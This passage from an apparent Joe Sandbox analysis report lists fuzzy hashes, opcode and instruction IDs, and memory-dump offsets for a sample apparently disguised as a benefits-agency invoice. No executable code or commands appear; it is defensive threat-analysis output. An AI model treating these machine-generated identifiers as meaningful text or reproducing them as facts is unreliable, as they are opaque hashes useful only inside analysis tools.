                                                                                  • Instruction ID: b8873f1d149fcb8917fda4661b946974e02377d62d6495488d6cc2dfdd599055
                                                                                  • Opcode Fuzzy Hash: 5d28139432349dc4a5b7d1f1994ab875bf837612ec3258700124ec523f707123
                                                                                  • Instruction Fuzzy Hash: 77911874A00609CFCB14DBA8C594AADBBF2FF89310B5445A9E546EB365DB31ED01CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e74802a59f2970c2929577f138b95fe31108699b09aadc178f55b7de052c6a2c
                                                                                  • Instruction ID: 0916c0142130ae76715056a12655e4f445ff9d733eeb8813386a7095cc17ca06
                                                                                  • Opcode Fuzzy Hash: e74802a59f2970c2929577f138b95fe31108699b09aadc178f55b7de052c6a2c
                                                                                  • Instruction Fuzzy Hash: 16813D78B102059FCB15DF69D594A6EBBF2FB88310B14856AE81ADB358DF74EC06CB40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a7d9d2386e407525f5aa619d15258ca206063165b6e80aa69802c5df9b1fc9f4
                                                                                  • Instruction ID: 8a60f0b0352f417843a27c47c1900d7a6f39ec9e13699ba8967be3f4bf570024
                                                                                  • Opcode Fuzzy Hash: a7d9d2386e407525f5aa619d15258ca206063165b6e80aa69802c5df9b1fc9f4
                                                                                  • Instruction Fuzzy Hash: 85914B34A102498BCB64DF69D54459EBBF2FF8A320B1481AEE8559F358DB71EC06CF80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1a06ef1e9e93462356b6bc252c6f848dafc6aa9683f8137a96d001ce7ef9d44b
                                                                                  • Instruction ID: caaf1f3e3bed6f93c0a5d0a94a475d0af5b0317282212af79e9a5332e87363e5
                                                                                  • Opcode Fuzzy Hash: 1a06ef1e9e93462356b6bc252c6f848dafc6aa9683f8137a96d001ce7ef9d44b
                                                                                  • Instruction Fuzzy Hash: 50812C38B102059FCB55DF69D594A6EBBF2FB88310B14856AE81ADB358DF74EC06CB40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 11a3859745db8609dbe8d2b9ab44a50e2658aae0e05e86149b16229129ec9c2f
                                                                                  • Instruction ID: 2ae93a85746b13e6f5190172fadf11aa04e5941dcac370c924eb9f02ef894f70
                                                                                  • Opcode Fuzzy Hash: 11a3859745db8609dbe8d2b9ab44a50e2658aae0e05e86149b16229129ec9c2f
                                                                                  • Instruction Fuzzy Hash: 8071BD75B002059FC704DB68C884E6ABBF2FB88310F5581A5E989DB352DB34EC01CBA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9370a988e7a69af6b56fe7d77b79223a836ff0699b14c936a86946c172fb70ac
                                                                                  • Instruction ID: 938fb84edb6b396d68ad6afaa5731dec6004785c961ecaf29ef18d1943103d76
                                                                                  • Opcode Fuzzy Hash: 9370a988e7a69af6b56fe7d77b79223a836ff0699b14c936a86946c172fb70ac
                                                                                  • Instruction Fuzzy Hash: 2A817E74B006159FDB04DF68C884AAEB7B6FF84310F158199E909AF392DB74ED81CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 130df0ba58e28c3d22ca6aabfc015750cd63ef8de541ad097b2649ebf625a4a5
                                                                                  • Instruction ID: de1efac52a90a3386e88d259c686d6166a33ed7662be641878340b936eca77f7
                                                                                  • Opcode Fuzzy Hash: 130df0ba58e28c3d22ca6aabfc015750cd63ef8de541ad097b2649ebf625a4a5
                                                                                  • Instruction Fuzzy Hash: 85719476B001199FDB18DF68C884AAEB7F2FF88310F148165E919A7365DF31AD51CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f75fc9324835cffb15c2b7191644c86879137004e63b62bf64455056fbbf8c54
                                                                                  • Instruction ID: d8e2d8dfc941504d87eb16e652a0c392ac894a7e5f18efcf41b1f39f84464741
                                                                                  • Opcode Fuzzy Hash: f75fc9324835cffb15c2b7191644c86879137004e63b62bf64455056fbbf8c54
                                                                                  • Instruction Fuzzy Hash: D5815C75A00704EFCB24CF68C5C0A6EB7B2FF84314B459968E996AF655DB31F841CBA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 759d30b987be1174a19f5ccdf28d553075dd29fc4c6448c74e8a53c168045c6e
                                                                                  • Instruction ID: 55cea621f1934d86f048dbdef329c31c7c2efd738c3e974cbc4addb4b1c5751f
                                                                                  • Opcode Fuzzy Hash: 759d30b987be1174a19f5ccdf28d553075dd29fc4c6448c74e8a53c168045c6e
                                                                                  • Instruction Fuzzy Hash: 0B71EF70A006199FCB14DB68D594B9CBBF2FF89310F5581A9E049EB3A5DF34AD05CB80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 363452f166bea29503ba0278d034035832456559f234de8022b71f0e4dd40a98
                                                                                  • Instruction ID: da68db9711ab538e96bcd9959603a0e3523cdccd6051f36a2796473181acb765
                                                                                  • Opcode Fuzzy Hash: 363452f166bea29503ba0278d034035832456559f234de8022b71f0e4dd40a98
                                                                                  • Instruction Fuzzy Hash: A2619F35B102058FCB44DF69C9845AEBBF2FF8932075985AEE44AEB355DB34EC068B50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 12ea927a75d2171fe0fca493a7b1f46c257f4a974a88363cfad6257aeb412b1c
                                                                                  • Instruction ID: 952333bd8c5842ba84ba18f942eece9eb421aa7e8da7a0a89ec446c6083d4dce
                                                                                  • Opcode Fuzzy Hash: 12ea927a75d2171fe0fca493a7b1f46c257f4a974a88363cfad6257aeb412b1c
                                                                                  • Instruction Fuzzy Hash: 76515079B002058FCB11DF68C88496ABBF6FF8C314B149569E645DB368EF70ED058B90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bacc986962f3663c737870142c63206bc1506ab3196c21430ea7b839873e66d2
                                                                                  • Instruction ID: eab90e9a594e438059f05190c2d1eb5c72821ae4e8d2e2fc41182b185d8000fd
                                                                                  • Opcode Fuzzy Hash: bacc986962f3663c737870142c63206bc1506ab3196c21430ea7b839873e66d2
                                                                                  • Instruction Fuzzy Hash: E8514C78B002058FCB11DF69C88496ABBF6FF8C314B149569E685DB369EF70ED058B90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7f1acd7700ce0a7c5360dcabdeec8b051db16eae6913a8fc944250d711a234be
                                                                                  • Instruction ID: 8658f1346f4fd3eece40b55a5190978d00c5946b52107fae2148918a00e84fb0
                                                                                  • Opcode Fuzzy Hash: 7f1acd7700ce0a7c5360dcabdeec8b051db16eae6913a8fc944250d711a234be
                                                                                  • Instruction Fuzzy Hash: 456143386106018FC744DF29C98995EBBF2FF8971475585AAE44ADB739EB30EC05CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8ce4edb8bcaa10ad5c6d2ef2ad186875f5ed87102a6164ef0886b4f9b8647b9d
                                                                                  • Instruction ID: 7d44b41e691bf1b9e52aabe3fa0934a1fa2ad6f4d13231d20f2f5049104f55ff
                                                                                  • Opcode Fuzzy Hash: 8ce4edb8bcaa10ad5c6d2ef2ad186875f5ed87102a6164ef0886b4f9b8647b9d
                                                                                  • Instruction Fuzzy Hash: 19512B75A10615CFCB05CFA9C88499DBBF6FF8A700B25816AE505EF361DB71AD05CB40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6bea97c9eda111afcdfceb6860cdf087eefec02124d8cdb32cf89e3ea45f0d76
                                                                                  • Instruction ID: a697fa99e55c62a73f577eab2e4a1d32b812d36c12b468f09628118c6a8fbd60
                                                                                  • Opcode Fuzzy Hash: 6bea97c9eda111afcdfceb6860cdf087eefec02124d8cdb32cf89e3ea45f0d76
                                                                                  • Instruction Fuzzy Hash: B9611F38610A018FCB54DF29C58895EBBF2FF8971475585AAE54ADB738DB30EC05CB80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f2363c251ec452e3291423917fe7cca299c7e968248e1cddf5aa485da87a40d8
                                                                                  • Instruction ID: abe876e6e132b3e9a7a8991eaa8a20a41f5205d846e9a15007f3ce52517946ed
                                                                                  • Opcode Fuzzy Hash: f2363c251ec452e3291423917fe7cca299c7e968248e1cddf5aa485da87a40d8
                                                                                  • Instruction Fuzzy Hash: A9516B34A006049FCB20DF68D4C4E6EBBB6FF88310B958495E6499B355EB35EC01CBA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 30991baa2cdd8f688d07fff23100b79cdd624b313b8e96b5708eed6c3eca7954
                                                                                  • Instruction ID: c2cf07e8479343147b5510dd119d04b112efaae58e6cd3c625ff48da4c6dc38e
                                                                                  • Opcode Fuzzy Hash: 30991baa2cdd8f688d07fff23100b79cdd624b313b8e96b5708eed6c3eca7954
                                                                                  • Instruction Fuzzy Hash: FE51A074A00609DFDB14DF68E588B9CBBF2FF89314F5485A9E449A7265DF30AD05CB80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 51693fee6deda6ab6be68f21d198618a31c66dfedcc5406082dc5f1e7868b4fb
                                                                                  • Instruction ID: 5d4e2cbfb0124a71c3461bacf40ce7e4b077386fd23cc5f9ff3fab307bb52195
                                                                                  • Opcode Fuzzy Hash: 51693fee6deda6ab6be68f21d198618a31c66dfedcc5406082dc5f1e7868b4fb
                                                                                  • Instruction Fuzzy Hash: B451BF75B002105FCB15AB64C894B7EBBF2EF88710F195099E946DB3A6DF35AC028B91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 40243c26205ab2786761983b84b4645d42e58d9bf049cecea68df44ceefd5d36
                                                                                  • Instruction ID: 65a50d62bbf8b5de962017140a602349c4cf045ba01484ed66d3bd611bf750c6
                                                                                  • Opcode Fuzzy Hash: 40243c26205ab2786761983b84b4645d42e58d9bf049cecea68df44ceefd5d36
                                                                                  • Instruction Fuzzy Hash: DF519175A00B058FD760CF69D58095EF7F6FB88320B109A1AE99AD7B54EB30F900CB80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 60961e8cf83107f2c133ea435a41476ba62beb773182e799035786faeccfa43d
                                                                                  • Instruction ID: b8d1bb62bf26f5aed41036c5f5a28f39338192adb121e5c6bdaae6cce597c9e5
                                                                                  • Opcode Fuzzy Hash: 60961e8cf83107f2c133ea435a41476ba62beb773182e799035786faeccfa43d
                                                                                  • Instruction Fuzzy Hash: 2E517030E1030A9FDB14DFB5D944BDDBBB1FF89300F15866AE404AB254EB79A949CB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 465410c3176715fba0f45dbc7a944676a66ff92aa4e1d2751a73868d15e3e355
                                                                                  • Instruction ID: ed983175486dc718ccfb15fae5ba0c4cab33cff8bc3adc12d954c4e86caad3d8
                                                                                  • Opcode Fuzzy Hash: 465410c3176715fba0f45dbc7a944676a66ff92aa4e1d2751a73868d15e3e355
                                                                                  • Instruction Fuzzy Hash: F5515B746106058FCB68DF29D8D466BBBB1EF89321B0445A9E815DF3A9DB30EC12CF94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: aaaf09bbb6559078f72b8bb56e1a1580f9843cad30eb86c077231b79a7b4a4d1
                                                                                  • Instruction ID: e4652c80ce1a09af27270df3c2e71f605a5fff0f294ddc1553afee043e29bb2b
                                                                                  • Opcode Fuzzy Hash: aaaf09bbb6559078f72b8bb56e1a1580f9843cad30eb86c077231b79a7b4a4d1
                                                                                  • Instruction Fuzzy Hash: F5517774B006059FDB04DF58C885EAEB7B6EF84310F1580A8E905AF3A2DB35EC42CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5b8cd722131d0865bc102133357976ac2c577c57343079bbe5abd64f0bb42074
                                                                                  • Instruction ID: 81e078517a8004b28735013d86c2fbe4d600a18200da024beb52cef023b59b4f
                                                                                  • Opcode Fuzzy Hash: 5b8cd722131d0865bc102133357976ac2c577c57343079bbe5abd64f0bb42074
                                                                                  • Instruction Fuzzy Hash: 57518F30E1030A9FCB10DFB5D944BDDBBB1FF89300F15855AE404AB298EB79A949CB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2d218fbd4de586f58ee1d00d82e82e6dd582155ec04a64f217ae72847165ec74
                                                                                  • Instruction ID: 8380039b98df077a4db47119fa59f66adabe85709061854df998dc39dc53239c
                                                                                  • Opcode Fuzzy Hash: 2d218fbd4de586f58ee1d00d82e82e6dd582155ec04a64f217ae72847165ec74
                                                                                  • Instruction Fuzzy Hash: A4517B39920605DFCB05DF55E984C9ABB72FF89304B008299F9856B321DB31EC86DF80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f0950e33c89c0ba5429ae8087d1f305b6573c73857dcc24f0980817e3979fdb3
                                                                                  • Instruction ID: b698c062af13e420c12faecb9698e82e43ce9d5ad35bc1e74235e080c8d56c0b
                                                                                  • Opcode Fuzzy Hash: f0950e33c89c0ba5429ae8087d1f305b6573c73857dcc24f0980817e3979fdb3
                                                                                  • Instruction Fuzzy Hash: D2313C5656D7E10BE346676CE9713CA3F618F963A5F4D01A3C0C4CA2ABE858480983E6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 730321097bdd8b7289fb5c65e65557b8adcc716b3db6e7146dcff9270a95baf0
                                                                                  • Instruction ID: 8b0479f036822a2e3ae57169c4fdc5ea22ca1ace66eb025f0b0020508911afa8
                                                                                  • Opcode Fuzzy Hash: 730321097bdd8b7289fb5c65e65557b8adcc716b3db6e7146dcff9270a95baf0
                                                                                  • Instruction Fuzzy Hash: A841287DB10245DFCB44DB59C88096ABBFAEB8D204B1480AAE549DF364DB31ED02CF65
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: daa457ae24993dde91aaa50ce7256cd6faef8fae4499985fa3bd84447550905f
                                                                                  • Instruction ID: 42f3e44011395d16b3c79b3b214d75c477f2fa6d28039129d9ba4349c8eb0c9b
                                                                                  • Opcode Fuzzy Hash: daa457ae24993dde91aaa50ce7256cd6faef8fae4499985fa3bd84447550905f
                                                                                  • Instruction Fuzzy Hash: BC319C34B102058FDB55EF6A81A86AFFBF6AF89310F15846ED516EB354DF709C008B94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 851cb0304febc86de12e5ab54a536427cf14983c0aa56c8dbbca9185065f34d3
                                                                                  • Instruction ID: 74fda3a1614e8b6e499eeadfe4a230ac9bdce4c8439c69469cc40fa4b0cc9a90
                                                                                  • Opcode Fuzzy Hash: 851cb0304febc86de12e5ab54a536427cf14983c0aa56c8dbbca9185065f34d3
                                                                                  • Instruction Fuzzy Hash: 68313C70B102098FCF14DBA8C494A6EFBF6EF89214B50946AD54AD7359EF70ED018B90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 91fb809084a1e4dade7f6ab8b95052c972f31f561f19cc84d5a67c4531868a8c
                                                                                  • Instruction ID: 0c7e07937b67742d1ec5035bced11bdb3c677c6447c3838105ebe92ed6ec6f9e
                                                                                  • Opcode Fuzzy Hash: 91fb809084a1e4dade7f6ab8b95052c972f31f561f19cc84d5a67c4531868a8c
                                                                                  • Instruction Fuzzy Hash: 8F31F4757042154BDB08A6798860B7F7BEBEFC4700F64847ED24ACB394EE389C068391
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: aee8bbfe268dc6971db18007322552f4c786307b7208b9581f8b7b2169e32846
                                                                                  • Instruction ID: 0989275772a40466f57263badf8bc3e013210b270f8809462b8ef11dfa888c41
                                                                                  • Opcode Fuzzy Hash: aee8bbfe268dc6971db18007322552f4c786307b7208b9581f8b7b2169e32846
                                                                                  • Instruction Fuzzy Hash: 2441BC38A002058FCB54DB65C598B6EBFF2FF48304F188069E5059B3A5CB74AC46CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 998b9bfa3bdee14f01864cffa91f3907b39bfd39c79ad327fbf2d6a08ae642df
                                                                                  • Instruction ID: b091ab52cac8c77702c8f014707dbad2c67948c3b87f0bf7e60c97ecb047c655
                                                                                  • Opcode Fuzzy Hash: 998b9bfa3bdee14f01864cffa91f3907b39bfd39c79ad327fbf2d6a08ae642df
                                                                                  • Instruction Fuzzy Hash: 0A414335A00649DFCB01CF58C990DAABBF5FF4A314B24C4ADE9459B361D732E916CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b2c76ab947bc7049151de14843d742679a745b661093425338d5490cf611e1b6
                                                                                  • Instruction ID: 74964437ec8536a32c634b894e9d07c81b4c98c4eb3ce6089fa8a87c1ba1026d
                                                                                  • Opcode Fuzzy Hash: b2c76ab947bc7049151de14843d742679a745b661093425338d5490cf611e1b6
                                                                                  • Instruction Fuzzy Hash: D0416378E112199FDB58DFAAD940AAEBBF2BF88300F14812AD814AB354DB349945CF54
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ebe08b22ea6789ab48c48209d43b7e15f80e1114148095fd852935233e72fab0
                                                                                  • Instruction ID: 169edf3f32f63cb8222d76b124d5e5af0ca5a4d9fc1353fbb9282b843495460f
                                                                                  • Opcode Fuzzy Hash: ebe08b22ea6789ab48c48209d43b7e15f80e1114148095fd852935233e72fab0
                                                                                  • Instruction Fuzzy Hash: 12311C35B001199FCB44CF69D980999BBB6FF4D324B1481AAE919EB361D732EC06CB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: abd12424db4676c46b5132ec327a90f01903b14c6aa9410a054f0c0785c5978c
